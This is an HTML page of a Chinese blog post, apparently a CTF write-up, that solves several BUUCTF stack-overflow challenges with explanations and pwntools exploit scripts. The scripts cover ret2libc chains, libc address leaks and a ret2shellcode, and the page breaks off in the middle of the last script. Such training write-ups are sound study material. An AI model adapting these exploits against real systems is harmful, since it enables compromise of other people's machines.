

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.ico">
  <link rel="icon" href="/img/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Modifier">
  <meta name="keywords" content="">
  
    <meta name="description" content="BUUCTF 第一页，无脑复健一下">
<meta property="og:type" content="article">
<meta property="og:title" content="随机掉落做题复健">
<meta property="og:url" content="https://shmodifier.github.io/2024/03/17/%E5%A4%8D%E5%81%A5/index.html">
<meta property="og:site_name" content="Modifier">
<meta property="og:description" content="BUUCTF 第一页，无脑复健一下">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://shmodifier.github.io/img/%E5%A4%8D%E5%81%A5/%E9%A1%B5%E9%A6%96%E5%9B%BE.jpg">
<meta property="article:published_time" content="2024-03-17T12:35:24.000Z">
<meta property="article:modified_time" content="2024-03-24T11:18:29.880Z">
<meta property="article:author" content="Modifier">
<meta property="article:tag" content="格式化字符串">
<meta property="article:tag" content="整数溢出">
<meta property="article:tag" content="stack">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://shmodifier.github.io/img/%E5%A4%8D%E5%81%A5/%E9%A1%B5%E9%A6%96%E5%9B%BE.jpg">
  
  
  
  <title>随机掉落做题复健 - Modifier</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"shmodifier.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":false,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Have a nice day!</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/%E5%A4%8D%E5%81%A5/%E9%A1%B5%E9%A6%96%E5%9B%BE.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="随机掉落做题复健"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-03-17 20:35" pubdate>
          2024年3月17日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          16k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          136 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">随机掉落做题复健</h1>
            
            
              <div class="markdown-body">
                
                <p>BUUCTF 第一页，无脑复健一下</p>
<span id="more"></span>

<p><del>虽然本来就很菜</del></p>
<h1 id="基础-ROP"><a href="#基础-ROP" class="headerlink" title="基础 ROP"></a>基础 ROP</h1><h3 id="jarvisoj-level2-x64"><a href="#jarvisoj-level2-x64" class="headerlink" title="jarvisoj_level2_x64"></a>jarvisoj_level2_x64</h3><p><img src="/img/%E5%A4%8D%E5%81%A5/jarvisoj_level2_main.png" srcset="/img/loading.gif" lazyload></p>
<p>很简单，我们只需要栈溢出调用 system ，再把 system 的变量变成 “<code>/bin/sh</code>“即可</p>
<p>找到程序中有该字符串</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/jarvisoj_level2_sh.png" srcset="/img/loading.gif" lazyload></p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>sh=process(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><br>sh_bin=<span class="hljs-number">0x600A90</span><br>pop_rdi=<span class="hljs-number">0x4006b3</span><br>system_add=<span class="hljs-number">0x4004C0</span><br><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*<span class="hljs-number">88</span>+p64(pop_rdi)+p64(sh_bin)+p64(system_addr)<br><br>sh.sendline(payload)<br><br>sh.interactive()<br></code></pre></td></tr></table></figure>



<h3 id="OGeek2019-babyrop"><a href="#OGeek2019-babyrop" class="headerlink" title="[OGeek2019]babyrop"></a>[OGeek2019]babyrop</h3><p>main 函数里的逻辑是：</p>
<p>生成一个随机数，把这个随机数作为参数传进 <code>sub_804871F()</code> 函数里，然后将该函数返回的结果作为参数再传进 <code>sub_80487D0()</code> 里</p>
<p>其中 <code>sub_804871F()</code> 中逻辑如下：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/%5BOGeek2019%5Dbabyrop-main2.png" srcset="/img/loading.gif" lazyload></p>
<p>我们需要保证 strncmp() 的结果不为 0，不然程序会异常退出。</p>
<p><code>sub_80487D0()</code> 函数中的逻辑如下：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/%5BOGeek2019%5Dbabyrop-read.png" srcset="/img/loading.gif" lazyload></p>
<p>传入的这个 a1 就是上方  <code>sub_804871F()</code> 函数中返回的 buf 第七个字节的 ascii 码。因为 buf 由我们自己来输入，我们可以控制 read 读入的长度，所以可以造成溢出。</p>
<p>漏洞具体利用方法：</p>
<ul>
<li><p>要控制 <code>strncmp()</code> 的结果不为 0，就要保证 s 和 buf 相等。<code>strncmp()</code> 以 <code>&#39;/x00&#39;</code> 截断。所以我们可以在输入的 buf 前加上 <code>&#39;/x00&#39;</code> 。</p>
</li>
<li><p>要在 <code>sub_80487D0()</code> 函数中造成溢出，缓冲区长度就有 231+4&#x3D;235 这么长，所以我们需要找一个 ascii 码足够大的字符。</p>
<p>但是能搜到的 ascii 码的字符，实际输出都没有拓展表中标注的这么大。所以我们采用另一个方法：转义字符。</p>
<blockquote>
<p>\ 为转义字符，而 ‘\xhh’ 表示 ASCII 码值与 ‘hh’ 这个十六进制数相等的符号，例如 ‘\xff’ 表示 ASCII 码为 255 的符号。</p>
</blockquote>
</li>
<li><p>实现溢出后利用 write() 函数泄露 libc 基质，而后回到 main ，再次修改返回地址为 system 的 ROP 链</p>
</li>
</ul>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher<br>context(log_level=<span class="hljs-string">&#x27;debug&#x27;</span>,arch=<span class="hljs-string">&#x27;i386&#x27;</span>,os=<span class="hljs-string">&#x27;linux&#x27;</span>)   <br><br>sh=remote(<span class="hljs-string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="hljs-number">28133</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br>libc=ELF(<span class="hljs-string">&#x27;./libc-2.23.so&#x27;</span>)<br>main_addr= <span class="hljs-number">0x08048825</span><br>write_plt = elf.plt[<span class="hljs-string">&quot;write&quot;</span>]<br>write_got = elf.got[<span class="hljs-string">&quot;write&quot;</span>]<br><br>payload=<span class="hljs-string">b&#x27;\x00&#x27;</span>+<span class="hljs-string">b&#x27;\xff&#x27;</span>*<span class="hljs-number">7</span><br><br>sh.sendline(payload)<br><br>padding=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0xe7</span>+<span class="hljs-number">4</span>)<br>payload1=padding+p32(write_plt)+p32(main_addr)+p32(<span class="hljs-number">1</span>)+p32(write_got)+p32(<span class="hljs-number">4</span>)<br>sh.recvuntil(<span class="hljs-string">&quot;Correct\n&quot;</span>)<br>sh.sendline(payload1)<br><br>write_addr = u32(sh.recv(<span class="hljs-number">4</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(write_addr))<br><br>libc_base = write_addr -  libc.sym[<span class="hljs-string">&quot;write&quot;</span>]<br>system_addr = libc_base+libc.sym[<span class="hljs-string">&quot;system&quot;</span>]<br>bin_sh_addr = libc_base+<span class="hljs-built_in">next</span>(libc.search(flat(<span class="hljs-string">&quot;/bin/sh&quot;</span>)))<br><br>sh.sendline(payload)<br><br>sh.recvuntil(<span class="hljs-string">&quot;Correct\n&quot;</span>)<br>payload2 =padding+p32(system_addr)+p32(<span class="hljs-number">0</span>)+p32(bin_sh_addr)<br>sh.sendline(payload2)<br>sh.interactive()<br></code></pre></td></tr></table></figure>



<h3 id="ciscn-2019-n-5"><a href="#ciscn-2019-n-5" class="headerlink" title="ciscn_2019_n_5"></a>ciscn_2019_n_5</h3><p>超简单的 ret2shellcode，什么保护都没开</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_n_5_check.png" srcset="/img/loading.gif" lazyload></p>
<p>main函数中的逻辑如下：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_n_5_main.png" srcset="/img/loading.gif" lazyload></p>
<p>我们直接向 name 中写入 shellcode，再在输入 text 时溢出修改返回地址到 name 地址处执行 shellcode 即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>p = remote(<span class="hljs-string">&quot;node5.buuoj.cn&quot;</span>,<span class="hljs-number">25735</span>)<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level=<span class="hljs-string">&#x27;debug&#x27;</span>) <br>shellcode = asm(shellcraft.sh())<br>name_addr = <span class="hljs-number">0x0601080</span><br>p.sendlineafter(<span class="hljs-string">&quot;tell me your name\n&quot;</span>,shellcode)<br>payload = <span class="hljs-string">&#x27;a&#x27;</span> * (<span class="hljs-number">0x20</span> + <span class="hljs-number">0x8</span>) + p64(name_addr)<br>p.sendlineafter(<span class="hljs-string">&quot;What do you want to say to me?\n&quot;</span>,payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>



<h3 id="ciscn-2019-en-2"><a href="#ciscn-2019-en-2" class="headerlink" title="ciscn_2019_en_2"></a>ciscn_2019_en_2</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs c">from pwn import*<br>from LibcSearcher import*<br><br>r=remote(<span class="hljs-string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="hljs-number">26445</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><br>main=<span class="hljs-number">0x400b28</span><br>pop_rdi=<span class="hljs-number">0x400c83</span><br>ret=<span class="hljs-number">0x4006b9</span><br><br>puts_plt=elf.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>puts_got=elf.got[<span class="hljs-string">&#x27;puts&#x27;</span>]<br><br>r.sendlineafter(<span class="hljs-string">&#x27;choice!\n&#x27;</span>,<span class="hljs-string">&#x27;1&#x27;</span>)<br>payload=b<span class="hljs-number">&#x27;</span>\<span class="hljs-number">0&#x27;</span>+b<span class="hljs-number">&#x27;</span>a<span class="hljs-number">&#x27;</span>*(<span class="hljs-number">0x50</span><span class="hljs-number">-1</span>+<span class="hljs-number">8</span>)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)<br><br>r.sendlineafter(<span class="hljs-string">&#x27;encrypted\n&#x27;</span>,payload)<br>r.recvline()<br>r.recvline()<br><br>puts_addr = u64(r.recvline()[:<span class="hljs-number">-1</span>].ljust(<span class="hljs-number">8</span>, b<span class="hljs-number">&#x27;</span>\<span class="hljs-number">0&#x27;</span>))<br><br><br>libc=LibcSearcher(<span class="hljs-string">&#x27;puts&#x27;</span>,puts_addr)<br>offset=puts_addr-libc.dump(<span class="hljs-string">&#x27;puts&#x27;</span>)<br>binsh=offset+libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br>system=offset+libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br><br>r.sendlineafter(<span class="hljs-string">&#x27;choice!\n&#x27;</span>,<span class="hljs-string">&#x27;1&#x27;</span>)<br><br>payload=b<span class="hljs-number">&#x27;</span>\<span class="hljs-number">0&#x27;</span>+b<span class="hljs-number">&#x27;</span>a<span class="hljs-number">&#x27;</span>*(<span class="hljs-number">0x50</span><span class="hljs-number">-1</span>+<span class="hljs-number">8</span>)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)<br><br>r.sendlineafter(<span class="hljs-string">&#x27;encrypted\n&#x27;</span>,payload)<br><br>r.interactive()<br></code></pre></td></tr></table></figure>



<h3 id="ciscn-2019-ne-5"><a href="#ciscn-2019-ne-5" class="headerlink" title="ciscn_2019_ne_5"></a>ciscn_2019_ne_5</h3><p>main函数中的逻辑如下，首先需要输入一个密码，密码正确后进入菜单：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_ne_5_main.png" srcset="/img/loading.gif" lazyload></p>
<p>AddLog：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_ne_5_add.png" srcset="/img/loading.gif" lazyload></p>
<p>接收了用户的128长度的输入并存储在 a1 中，此处的 a1 即是 main 函数中的 <em>src</em> 。 <em>src</em> 的长度是 48。</p>
<p>Print：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_ne_5_system.png" srcset="/img/loading.gif" lazyload></p>
<p>这里面调用了 <code>system()</code> 函数，可以供我们后续使用。</p>
<p>GetFlag：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_ne_5_getflag.png" srcset="/img/loading.gif" lazyload></p>
<p>在这个函数中，程序将 src 复制给 dest，而此处的 dest 也是 48 字节长度。</p>
<p>在整个程序中，我们可以利用 Add 控制 src 的输入，再利用 GetFlag 函数进而控制 dest 。因此，我们可以造成溢出，通过溢出 dest 控制函数的返回地址为 system()，从而实现 getshell。</p>
<p>用 ROPgadget 来搜索一下程序里的 <code>&#39;/bin/sh&#39;</code> 字符串的地址，没有找到，但是发现有 <code>&#39;sh&#39;</code> 字符串，这个效果是一样的</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/ciscn_2019_ne_5_sh.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>sh=remote(<span class="hljs-string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="hljs-number">26469</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><br>password=<span class="hljs-string">&#x27;administrator&#x27;</span><br><br>bin_sh=<span class="hljs-number">0x080482ea</span><br>system_addr=elf.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br><br>sh.recvuntil(<span class="hljs-string">&#x27;Please input admin password:&#x27;</span>)<br>sh.sendline(password)<br><br>sh.recvuntil(<span class="hljs-string">&#x27;0.Exit\n:&#x27;</span>)<br>sh.sendline(<span class="hljs-string">&#x27;1&#x27;</span>)<br><br>sh.recvuntil(<span class="hljs-string">&#x27;info:&#x27;</span>)<br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x48</span>+<span class="hljs-number">4</span>)+p32(system_addr)+p32(<span class="hljs-number">0</span>)+p32(bin_sh)<br>sh.sendline(payload)<br><br>sh.recvuntil(<span class="hljs-string">&#x27;0.Exit\n:&#x27;</span>)<br>sh.sendline(<span class="hljs-string">&#x27;4&#x27;</span>)<br><br>sh.interactive()<br></code></pre></td></tr></table></figure>



<h3 id="bjdctf-2020-babyrop"><a href="#bjdctf-2020-babyrop" class="headerlink" title="bjdctf_2020_babyrop"></a>bjdctf_2020_babyrop</h3><p>没什么特别的，就是这道题我匹配了超多 libc ，试了很多次才成功，就想记录一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher<br><br>sh=remote(<span class="hljs-string">&#x27;node5.buuoj.cn&#x27;</span>,<span class="hljs-number">29454</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br><br>main=<span class="hljs-number">0x040067D</span><br>puts_plt = elf.plt[<span class="hljs-string">&quot;puts&quot;</span>]<br>puts_got = elf.got[<span class="hljs-string">&quot;puts&quot;</span>]<br><br>pop_rdi=<span class="hljs-number">0x0400733</span> <br>ret=<span class="hljs-number">0x04004c9</span> <br><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)+ p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)<br>sh.recvuntil(<span class="hljs-string">&#x27;story!\n&#x27;</span>)<br>sh.sendline(payload)<br><br>puts_addr=u64(sh.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(puts_addr))<br><br>libc=LibcSearcher(<span class="hljs-string">&#x27;puts&#x27;</span>,puts_addr)  <br>base=puts_addr-libc.dump(<span class="hljs-string">&#x27;puts&#x27;</span>)    <br>bin_sh=base+libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br>system=base+libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br><br>payload=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)+ p64(pop_rdi) + p64(bin_sh)+p64(system)<br>sh.recvuntil(<span class="hljs-string">&#x27;story!\n&#x27;</span>)<br>sh.sendline(payload)<br><br>sh.interactive()<br></code></pre></td></tr></table></figure>





<h3 id="HarekazeCTF2019-baby-rop2"><a href="#HarekazeCTF2019-baby-rop2" class="headerlink" title="[HarekazeCTF2019]baby_rop2"></a>[HarekazeCTF2019]baby_rop2</h3><p>main 函数如下：</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/%5BHarekazeCTF2019%5Dbaby_rop2_main.png" srcset="/img/loading.gif" lazyload></p>
<p>很明显的栈溢出，read 读入100 字节，buf 长度只有 20。可以用来泄露基址在栈上构造 <code>system(&quot;/bin/sh&quot;)</code></p>
<p>需要注意的是，我们在这个程序当中是利用 printf 来输出地址，和之前的 puts 不一样。</p>
<p><code>printf</code> 实际上就是 <code>int printf( const char* format , [argument] ... );</code>，</p>
<p>printf 里面有两个参数（puts 只需要传一个），所以我们不仅要找 <code>pop_rdi</code> 还要找 <code>pop_rsi</code> 这个指令来传参，程序里招到的对应指令还带一个 <code>pop r15</code>，没关系我们只要给它设置一个参数 0 就行。</p>
<p><img src="/img/%E5%A4%8D%E5%81%A5/%5BHarekazeCTF2019%5Dbaby_rop2_rsi.png" srcset="/img/loading.gif" lazyload></p>
<p>我们构造的 payload 就写作：</p>
<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lisp">payload=b&#x27;a&#x27;*(<span class="hljs-number">0</span>x20+8)+p64(<span class="hljs-name">pop_rdi</span>)+p64(<span class="hljs-name">fmt_str</span>)+p64(<span class="hljs-name">pop_rsi_r15</span>)+p64(<span class="hljs-name">read_got</span>)+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-name">printf_got</span>)+p64(<span class="hljs-name">main</span>)<br></code></pre></td></tr></table></figure>

<p>payload 被发送并执行后就是：</p>
<ol>
<li><code>b&#39;a&#39;*(0x20+8)</code> ：栈溢出将返回地址覆盖</li>
<li><code>p64(pop_rdi)+p64(fmt_str)</code>：原本的返回地址被改成了 <code>pop rdi,ret</code> 。<code>pop rdi</code> 对应的参数 <em>fmt_str</em> 会对应的会传给 <em>rdi</em> </li>
<li><code>p64(pop_rsi_r15)+p64(read_got)+p64(0)</code>：<code>pop_rsi,pop_r15,ret;</code> 执行指令 <code>pop_rsi</code> 对应参数 <em>read_got</em> ,将 <em>rsi</em> 寄存器的值设置成了 read 函数的 got 表地址，<code>pop_r15</code> 对应参数 0，我们不用 <em>r15</em>，随便设置一下它就行</li>
<li><code>p64(printf_got)</code>：将 printf 函数的 plt 表地址传入栈中，以去执行 printf 函数，输出我们设置的 read 函数的地址</li>
<li><code>p64(main)</code>：在完成第一次利用后，得到了程序内read函数的地址，知道了libc基址，我们需要重新回到程序开头，再次利用这个输入点去写入 <code>system(&#39;/bin/sh&#39;)</code></li>
</ol>
<p>随后正常构造即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level=<span class="hljs-string">&#x27;debug&#x27;</span>)<br><br>sh=process(<span class="hljs-string">&#x27;./babyrop2&#x27;</span>)<br>elf=ELF(<span class="hljs-string">&#x27;./babyrop2&#x27;</span>)<br>main= elf.symbols[<span class="hljs-string">&#x27;main&#x27;</span>] <br><br>printf_plt = elf.plt[<span class="hljs-string">&quot;printf&quot;</span>]<br>read_got = elf.got[<span class="hljs-string">&quot;read&quot;</span>]<br><br><br>pop_rdi=<span 